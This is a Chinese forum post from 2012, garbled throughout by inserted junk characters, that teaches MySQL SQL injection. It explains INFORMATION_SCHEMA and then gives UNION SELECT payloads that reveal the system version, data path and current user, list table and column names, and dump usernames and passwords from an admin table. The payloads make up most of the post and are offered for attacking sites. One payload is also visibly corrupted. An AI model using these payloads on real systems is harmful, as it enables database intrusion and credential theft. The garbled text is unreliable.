本文介绍MYSQL盲注的一些语句和方法 {1 ^: c" p, X3 n
X# @, U9 A) [$ e1 {学习盲注前先了解下 IFORMATION_SCHEMA 库0 i1 ]# Z. G H: f
0 {2 n3 X& k6 x3 W* f4 l1 ?
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
7 }4 P' C8 v' A: H' d存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
. N- r! u' t1 o1.得到所有数据库名:* F2 J* J; v7 A3 d; f
|SCHEMATA ->存储数据库名的表# }$ q) `& s- y4 p
|---字段:SCHEMA_NAME ->数据库名称3 J' _6 `% e& Y R" B9 [- W0 o
+ @( ]1 p, E% `/ D* K1 v: r
|TABLES ->存储表名' r- h$ _- Q4 g8 m
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名$ K6 \3 ?* i' h9 @+ k4 l1 a
|---字段:TABLE_NAME ->存储表的表名
{+ A9 g! J9 V% w9 U. Q( Z, f/ O; r6 r' `: q' L0 ^, D
|COLUMNS ->存储的字段名表
. H. Y$ |5 V$ @9 H2 A& Y: g|---字段:TABLE_SCHEMA ->该字段所属数据库名
# ^8 |. O" A. p+ G2 n) L|---字段:TABLE_NAME ->存储所属表的名称
, z, a5 m( h2 j. ?" `7 m9 v. X" R7 B/ m
|---字段:COLUMN_NAME ->该字段的名称
, q3 V0 v* D* A+ n$ y; X J7 Z L/ t9 L) |- L! }# o
0 M& w; K/ P$ X6 a; I$ ?5 Q
8 B% a; v- N, x+ m) ~+ c& `+ v$ n
###########################################################################5 U- Y5 y" u+ k
, I5 H" W3 l: C" m1 S- o
0x001 获取系统信息:
) {/ C8 j+ S8 @- h8 M" `3 ?7 v B
2 F& Y7 o3 \. [union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*) k: n/ Z. N- d h; n8 [
3 R. P: g6 l3 G+ N9 e/ @/*) `3 Z4 N3 M: ~; M# m
+ u0 Z) _" u4 `" T) q$ b Q@@global.version_compile_os 获取系统版本
4 h/ n7 s" Y1 ]! z# B9 x" x% y- ?' r U" q% X: O
@@datadir 数据库路径6 U& y2 I! @( M# S& e
database() 当前数据库名称
9 R0 _% N# x7 @4 j( V' V$ v0x3c62723e 换行HEX值+ V6 G5 a y! c
: W- n; J3 E2 p2 H
*/+ n, }$ {( e2 C- n" z9 p3 ?- B
) `2 F: M' q/ G! v6 U! s/ k
9 S/ t7 _3 c+ {" W g" G- |
s6 x+ Z4 T9 E######################################################################2 `) o, ?, M2 @/ v6 C1 c7 }
, w* e, j5 }* Q, H0x002 获取表名
* A* H+ N; u) [3 k, p7 }7 X4 e- T. ~2 ?* o- C' [
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*; X4 y7 d. m+ `7 b$ T3 R
$ k1 _4 ~% d6 |3 t V7 Z/ I
$ T% J* l! s; N% d4 t/ t& l# Z4 ~( V5 T
/*
! r1 d7 A; _& C' o
1 Z0 u# _" h9 k4 q; Z$ Y: o0x67617264656e 为当前数据库名
0 O8 d; o$ u3 U* m* N( y! X6 q8 n. l% }6 ^! ^! Q
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名& e1 N8 N7 G( o2 D2 U
5 o! G0 r8 U/ c9 I* }*/1 |9 N$ n0 d7 ?) s/ u9 r5 D( P: u
2 W8 V! H8 U2 ?" \7 H) H$ n
######################################################################
- i2 v* c+ l$ ]3 E4 M4 s6 h/ N7 x# {0 Z1 L
: X4 O% ]4 ~# p" D9 K7 s% ]$ T
3 D# B: S' `1 Z
0x003 获取字段
* T3 u& c$ X6 c1 C% Y, c/ N0 ?( b& p! u# B! ~) y1 H+ ?& G$ ~2 a2 e
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
9 N. n! D$ s/ q$ k; m3 g) e+ \4 Q! ?' |* j0 A$ m) i
/*
. _8 k7 H, a& B2 [$ p4 F4 m; U0 p- W0 K" o
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
- K# h/ x6 F& ~) q) K# O( S3 q! d& E0 G, a4 h# O6 {
0x61646d696e ->选择一个表
0 |: U- z4 [' r! G
5 L2 x. B; R* }" `% W z0x67617264656e ->数据库名
2 f" z( `- D7 |
2 q" a0 q- c; q& O; u% q% E*/
- v% n! t1 d* O; x _5 ?
' d6 f; A. F2 i- h#####################################################################( N9 {+ }+ C' v# F. _0 I+ k1 ]
& _( |5 T$ e4 A+ Z% I' b3 r/ H6 T
4 i4 k* p; m0 z. W( z+ Z$ B
) `: G6 N# j2 z. L; z
0x004 获取数据
2 @3 ?" p @0 g. A% C( p% C" L
2 B3 ^$ n) w7 S; g. `union select 1,2,3
8 x! j' Y$ u) H5 I* X# y' C% G,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
+ h% G! M4 R8 [: i+ H z$ r) p+ x4 r8 ~9 A3 X/ H
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin- y. R% o G9 H5 |
. z1 Z1 ?3 R+ T2 e0 M9 D! u
: }6 D/ M- \' ?6 m0 ^6 x
: a$ m3 w- J# v/*
+ O6 m! f+ v( s( }+ E( A7 D4 K2 g" V# m7 X" h1 S! a" l
0x3c62723e 换行符号HEX编码
# a0 {1 K3 s3 _: a0 I' Q; \4 j3 N7 l: M& C
group_concat 同时获得该字段所有数据
* t. F. G" J. y' _2 T4 S# q. }4 |9 a- E9 k W
*/: |8 N" u5 ~: U- D$ @0 q" \
, _2 p1 p# ~; Z- q. @ |
发表于 2012-9-13 17:48:44
收藏
支持
反对